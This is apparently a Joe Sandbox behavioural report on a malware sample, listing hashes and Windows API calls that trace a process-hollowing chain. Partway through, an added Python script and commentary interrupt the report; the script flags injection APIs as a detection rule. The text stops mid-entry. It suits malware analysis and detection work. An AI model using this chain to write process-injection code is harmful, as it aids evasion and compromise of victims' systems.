                                                              • Opcode ID: 69268eb7c7c534cedd5e0b3e72c736b51be3e6d1ea9a6477a5541b734567f9a5
                                                              • Instruction ID: 31c27dd0bab3d0e955993dc083f2295c00d6a5781157b970560c50b4d31a346f
                                                              • Opcode Fuzzy Hash: 69268eb7c7c534cedd5e0b3e72c736b51be3e6d1ea9a6477a5541b734567f9a5
                                                              • Instruction Fuzzy Hash: 6D428C74A01229CFDB64CFA9D984B9DBBB2BF48310F1081A9D819AB355D735AE81CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fe073191e7a362b892d44a12915075ad2816c683953d49391fceb532002e8c3b
                                                              • Instruction ID: 32082f4000a37b9457830c0bdf5b6ebc887c80a2f43b943984c239b9418ba142
                                                              • Opcode Fuzzy Hash: fe073191e7a362b892d44a12915075ad2816c683953d49391fceb532002e8c3b
                                                              • Instruction Fuzzy Hash: AB619275E01218DFEB18CFAAD984B9DBBF2FF88310F1481A9D819AB254D7359942CF50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 35668724e540e18ac946dfb4a60ea53da51efa3e06c52fc8f1633287d38dc91a
                                                              • Instruction ID: fbfb1140bc22785ec296e44365a087eb4dea960a4375ac14a4394aa320cdfa00
                                                              • Opcode Fuzzy Hash: 35668724e540e18ac946dfb4a60ea53da51efa3e06c52fc8f1633287d38dc91a
                                                              • Instruction Fuzzy Hash: 8BE01278E0D190CFCB61EBB06D915F9BBB89B0B300B0A34EA825D9B612E52465529A15

                                                              Control-flow Graph (rendered image; executed/not-executed colouring not recoverable): function 232d291-232d46d, calling GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId and the internal routine 232d470
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0232D31E
                                                              • GetCurrentThread.KERNEL32 ref: 0232D35B
                                                              • GetCurrentProcess.KERNEL32 ref: 0232D398
                                                              • GetCurrentThreadId.KERNEL32 ref: 0232D3F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: 96a3b03859248c3533c615c535a9e2063bf72326fb9ed4e618b19d95305f87ba
                                                              • Instruction ID: 3069368d47e7383eb5fea62987d7e2dd862af07dccf2ba141098737e3aab5903
                                                              • Opcode Fuzzy Hash: 96a3b03859248c3533c615c535a9e2063bf72326fb9ed4e618b19d95305f87ba
                                                              • Instruction Fuzzy Hash: 345186B1A012098FDB14CFA9DA48BDEBFF1EF48314F24805DE509A7351D738A944CB65

                                                              Control-flow Graph (rendered image; executed/not-executed colouring not recoverable): function 232d2a0-232d46d, calling GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId and the internal routine 232d470
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 0232D31E
                                                              • GetCurrentThread.KERNEL32 ref: 0232D35B
                                                              • GetCurrentProcess.KERNEL32 ref: 0232D398
                                                              • GetCurrentThreadId.KERNEL32 ref: 0232D3F1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID:
                                                              • API String ID: 2063062207-0
                                                              • Opcode ID: e13edb9de55e9297b0a81b5b6d9c82c69e140623ae8fbb34c8ee9e1a953285c9
                                                              • Instruction ID: b39cded4d292508a2c96a55c0b69c762ae0a30f2af965c646ea085ba7a1603a4
                                                              • Opcode Fuzzy Hash: e13edb9de55e9297b0a81b5b6d9c82c69e140623ae8fbb34c8ee9e1a953285c9
                                                              • Instruction Fuzzy Hash: A55186B19002098FDB14CFAADA48BDEBBF1EF88314F24805DE509A7350E738A944CF65

                                                              Control-flow Graph (rendered image; executed/not-executed colouring not recoverable): function 44f4295-44f45e5, calling CreateProcessA from block 44f442f-44f44e9
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 044F44D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 770eaf8fce568e80339a3f675a7ee94516aead7fc3a1e3995538cf9db9e59bb1
                                                              • Instruction ID: c9beb7f3efa66762f2af9b4bfdd1279afb7e1816273ede4b528daa85b8cc9ea4
                                                              • Opcode Fuzzy Hash: 770eaf8fce568e80339a3f675a7ee94516aead7fc3a1e3995538cf9db9e59bb1
                                                              • Instruction Fuzzy Hash: A3A13B71D002199FEF20DF68CC41BEEBBB2BB48314F14856AD918A7250DB75A985CF91

                                                              Control-flow Graph (rendered image; executed/not-executed colouring not recoverable): function 44f42a0-44f45e5, calling CreateProcessA from block 44f442f-44f44e9
                                                              APIs
                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 044F44D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 340e6e8bc0ae264b087fc4337cbc878d174f7e2b59847cb056cd34722da65c33
                                                              • Instruction ID: b6aa4893a9741e713932224670044bec5de827452507992ca5d5eccea58945d1
                                                              • Opcode Fuzzy Hash: 340e6e8bc0ae264b087fc4337cbc878d174f7e2b59847cb056cd34722da65c33
                                                              • Instruction Fuzzy Hash: 71913B71D002299FEF20DF68CC41BEEBBB2BF48314F14856AD918A7250DB74A985CF91

                                                              Control-flow Graph (rendered image; executed/not-executed colouring not recoverable): function 232b008-232b288, calling GetModuleHandleW from block 232b240-232b26b and the internal routines 232acc0, 232b2a0/232b291, 232accc, 232acdc, 232acec, 232acfc
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0232B25E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 4c0720f342f6c299c82404248df680a5184c63ce77639a9d4a6fcbc91fc69891
                                                              • Instruction ID: 2caafd5e26590b428d04719839cdbbd758eae2d5ae53d62b882d4c030cc9d8b0
                                                              • Opcode Fuzzy Hash: 4c0720f342f6c299c82404248df680a5184c63ce77639a9d4a6fcbc91fc69891
                                                              • Instruction Fuzzy Hash: 367135B0A00B158FD725DF2AD44475ABBF6FF88308F00892ED49AD7A50DB75E949CB90

                                                              Control-flow Graph (rendered image; executed/not-executed colouring not recoverable): function 23244c4-2325a41, calling CreateActCtxA from block 23244c4-23259b9
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 023259A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 963c9570b1d80e21f9a07fe07062f4d67417d3acbdc1d84da351d0726405c914
                                                              • Instruction ID: 2009b2fae478bdecdbbfe6ab7ad214ee91eedbd07fd80da4f04847071550c620
                                                              • Opcode Fuzzy Hash: 963c9570b1d80e21f9a07fe07062f4d67417d3acbdc1d84da351d0726405c914
                                                              • Instruction Fuzzy Hash: 6741DFB0D00719CBDB24CFA9C884B9EBBF5BF48304F60816AD408AB251DB756949CF90

                                                              Control-flow Graph (rendered image; executed/not-executed colouring not recoverable): function 23258ed-2325a41, calling CreateActCtxA from block 23258ed-23259b9
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 023259A9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: d32eeb52b48940cd20d61b328d29e0ecd05180b7a905acf3884fd23cd08189cf
                                                              • Instruction ID: 6b3e7a9492e602c989f75fafd0a65cffa584e5db6c4b1bf1325b015d9c16b76e
                                                              • Opcode Fuzzy Hash: d32eeb52b48940cd20d61b328d29e0ecd05180b7a905acf3884fd23cd08189cf
                                                              • Instruction Fuzzy Hash: FD41CFB1C00719CFDB24CFA9C984B9EBBF5BF49304F60816AD409AB251DB75694ACF50

                                                              Control-flow Graph (rendered image; executed/not-executed colouring not recoverable): function 44f4011-44f40ee, calling WriteProcessMemory from block 44f4076-44f40b5
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 044F40A8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 658cd393d6a7fd154d6851022816b4fb09c0df23adbc4616083cff56413d26c8
                                                              • Instruction ID: 1c5ea6773428fa3eadd9b926dd0e65b927beda4be4e7d5fe5bd7863dba4ad84f
                                                              • Opcode Fuzzy Hash: 658cd393d6a7fd154d6851022816b4fb09c0df23adbc4616083cff56413d26c8
                                                              • Instruction Fuzzy Hash: 142146769002499FCF10CFA9C884BEEBFF5FF48310F14842AE959A7241C7799945DBA1

                                                              Control-flow Graph (rendered image; executed/not-executed colouring not recoverable): function 44f4018-44f40ee, calling WriteProcessMemory from block 44f4076-44f40b5
                                                              APIs
                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 044F40A8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 874cf79f4993ceacd618f919d5ab9a734f78d1f51f6443b25cc4336edfc36d5e
                                                              • Instruction ID: 0f7b1a0e6e1e3939b932aeb6d13f0a6c723a5d1b4557b1a39c487ebfb4c901a9
                                                              • Opcode Fuzzy Hash: 874cf79f4993ceacd618f919d5ab9a734f78d1f51f6443b25cc4336edfc36d5e
                                                              • Instruction Fuzzy Hash: F12157729003099FCF10CFA9C884BDEBBF5FF48310F10842AE919A7241CB79A944CBA1
                                                              APIs
                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 044F4188
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 880ca7f0135c8e4417df6d2f896b9610538a40b39dd7d686d7988b8cc774c4dc
                                                              • Instruction ID: 4fc552d3d23df928c388f5c3b194a4e48e46707a51600045918fba951ef61044
                                                              • Opcode Fuzzy Hash: 880ca7f0135c8e4417df6d2f896b9610538a40b39dd7d686d7988b8cc774c4dc
                                                              • Instruction Fuzzy Hash: A5214AB2D003599FDB10CF99C885ADEFBF5FF58320F10842AE518A7241C7399505DBA0
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 044F3EFE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: e256413f9c8f384dd23d649c748d857f11c5df0c9fb642c8949d1421358b93f9
                                                              • Instruction ID: 128aa384cb78888c8a070999d62598e7c4717a234a2ad86a7c533da3b2cafd39
                                                              • Opcode Fuzzy Hash: e256413f9c8f384dd23d649c748d857f11c5df0c9fb642c8949d1421358b93f9
                                                              • Instruction Fuzzy Hash: 9A2159759002098FDB10CFAAC8847EEBFF4EF48324F14842AD959A7241CB78A945CFA0
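The functions dumped from the 044F0000 region above reference CreateProcessA, WriteProcessMemory, ReadProcessMemory and Wow64SetThreadContext, which together are the primitives of a process-hollowing (RunPE) chain: spawn a target, read or unmap its image, write the payload in, and redirect the primary thread's entry point. The script below is an added example, not code from the Joe Sandbox report or from Joe Security. It parses entries in the report's own "APIs" / "Memory Dump Source" format, groups API references by dump Offset, and flags a region when its APIs cover several distinct injection stages. The stage table, the stage labels and the threshold of three stages are the author's assumptions; SAMPLE_REPORT is constructed to mirror the report's line format.

```python
"""Flag memory regions whose API references form a process-hollowing chain.

Added example (not from the Joe Sandbox report or Joe Security). It reads the
report's 'APIs' bullets and 'Memory Dump Source' lines, groups API names by the
dump Offset they were found in, and flags a region when its APIs cover several
distinct stages of a RunPE-style injection. The stage table and the threshold
of three stages are the author's assumptions; SAMPLE_REPORT is constructed to
mirror the report's line format.
"""
import re

# Injection primitives mapped to the hollowing stage they implement (assumed labels).
INJECTION_STAGES = {
    "CreateProcessA": "spawn-target",
    "CreateProcessW": "spawn-target",
    "NtUnmapViewOfSection": "unmap-image",
    "VirtualAllocEx": "allocate-in-target",
    "ReadProcessMemory": "read-target",
    "WriteProcessMemory": "write-payload",
    "SetThreadContext": "redirect-entry",
    "Wow64SetThreadContext": "redirect-entry",
    "ResumeThread": "resume-target",
}

# Matches "• CreateProcessA.KERNEL32(?,?), ref: 044F44D6" and the argument-less
# form "• GetCurrentProcess.KERNEL32 ref: 0232D31E"; the bullet is optional.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?P<api>[A-Za-z0-9_]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\(.*?\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Matches the "Offset: 044F0000" field of a "Source File:" line.
OFFSET_LINE = re.compile(r"Offset:\s*(?P<offset>[0-9A-Fa-f]+)")

# Constructed excerpt in the report's own format (a few entries per region).
SAMPLE_REPORT = """\
APIs
• NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 05068FD7
Memory Dump Source
• Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
APIs
• GetCurrentProcess.KERNEL32 ref: 0232D31E
• GetCurrentThread.KERNEL32 ref: 0232D35B
• GetCurrentThreadId.KERNEL32 ref: 0232D3F1
Memory Dump Source
• Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
APIs
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 044F44D6
Memory Dump Source
• Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
APIs
• WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 044F40A8
Memory Dump Source
• Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
APIs
• ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 044F4188
Memory Dump Source
• Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 044F3EFE
Memory Dump Source
• Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
APIs
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0232D56F
Memory Dump Source
• Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
"""


def parse_apis_by_region(report_text):
    """Group every (api, ref) pair by the memory-dump Offset it was found in.

    In the report the 'APIs' bullets of a function precede its 'Memory Dump
    Source' block, so references are buffered until the next Offset line
    names the region they belong to.
    """
    pending = []
    by_region = {}
    for line in report_text.splitlines():
        m = API_LINE.match(line)
        if m:
            pending.append((m.group("api"), m.group("ref").upper()))
            continue
        m = OFFSET_LINE.search(line)
        if m:
            region = m.group("offset").upper()
            by_region.setdefault(region, []).extend(pending)
            pending = []
    return by_region


def score_regions(by_region, min_stages=3):
    """Return, per region, the injection APIs seen and a hollowing verdict.

    A region is flagged when its APIs cover at least `min_stages` distinct
    chain stages (threshold is an assumption; tune it to your data). Repeated
    references to the same API (the report lists each function variant
    separately) are collapsed before counting.
    """
    verdicts = {}
    for region, refs in by_region.items():
        apis = sorted({api for api, _ in refs})
        hits = [a for a in apis if a in INJECTION_STAGES]
        stages = sorted({INJECTION_STAGES[a] for a in hits})
        verdicts[region] = {
            "apis": hits,
            "stages": stages,
            "hollowing": len(stages) >= min_stages,
        }
    return verdicts


if __name__ == "__main__":
    for region, v in score_regions(parse_apis_by_region(SAMPLE_REPORT)).items():
        flag = "HOLLOWING" if v["hollowing"] else "ok"
        print(f"{region}: {flag:9} stages={v['stages']} apis={v['apis']}")
```

Two caveats a detection engineer should keep: the report shows Wow64SetThreadContext rather than SetThreadContext, so a rule keyed only on the 64-bit name misses a 32-bit .NET injector running under WOW64; and ResumeThread does not appear in this excerpt, so the scoring counts distinct stages rather than requiring every step of the chain.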
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0232D56F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 044F3EFE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              APIs
                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 044F4188
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0232D56F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              APIs
                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 044F3FC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              • OutputDebugStringW.KERNEL32(00000000), ref: 05069C78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DebugOutputString
                                                              • String ID:
                                                              • API String ID: 1166629820-0
                                                              APIs
                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 044F3FC6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              • OutputDebugStringW.KERNEL32(00000000), ref: 05069C78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: DebugOutputString
                                                              • String ID:
                                                              • API String ID: 1166629820-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0232B25E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080954433.0000000002320000.00000040.00000800.00020000.00000000.sdmp, Offset: 02320000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2320000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 044F89D5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 044F89D5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000), ref: 05069D17
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000), ref: 05069D17
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Instruction Fuzzy Hash: BE118B75504280DFDB16CF14D5C4B15BBA1FB84314F24C6ADD8494B696C33AD84ACB61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080522138.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b1d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 575d9ba2004390c4fe462e9377df304071ca641fa2c5ce7cdcfdc7bc06a7253c
                                                              • Instruction ID: 692bf91d43d995b24286e02384035dca8969be46b8d46b8ccf6c6172ee7a5b45
                                                              • Opcode Fuzzy Hash: 575d9ba2004390c4fe462e9377df304071ca641fa2c5ce7cdcfdc7bc06a7253c
                                                              • Instruction Fuzzy Hash: 43012B711043409AE7119F15CDC4BA7FFD8DF41330F58C59AED080A2C6D6799C80C6B1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2080522138.0000000000B1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B1D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_b1d000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f9600d8fc3b66538cabcb29a81c2d2215f8d6afe9f87d962d945e2085df486f3
                                                              • Instruction ID: 158c88ef71415f9342675b2fbb3f91086fcd613934ab8ec9f02af09abb6edb80
                                                              • Opcode Fuzzy Hash: f9600d8fc3b66538cabcb29a81c2d2215f8d6afe9f87d962d945e2085df486f3
                                                              • Instruction Fuzzy Hash: C6F0C2720043409AE7108F16CD88BA2FFD8EB51334F18C15AFD080A286C2799C80CAB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2085826002.0000000005060000.00000040.00000800.00020000.00000000.sdmp, Offset: 05060000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_5060000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 23a40f119943d3da5575dd85d04f4467ad6ba0bf81f3cdbdbb0655620f824788
                                                              • Instruction ID: d28703baaf3f611f6621634dc8052e67c772ef5eb0a9850ee79b941f9f7a79d4
                                                              • Opcode Fuzzy Hash: 23a40f119943d3da5575dd85d04f4467ad6ba0bf81f3cdbdbb0655620f824788
                                                              • Instruction Fuzzy Hash: E532B074A01219CFDB94DFA9C584A8EFBF2BF48311F55D195D408AB222DB34E985CFA0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2084133663.00000000044F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_44f0000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
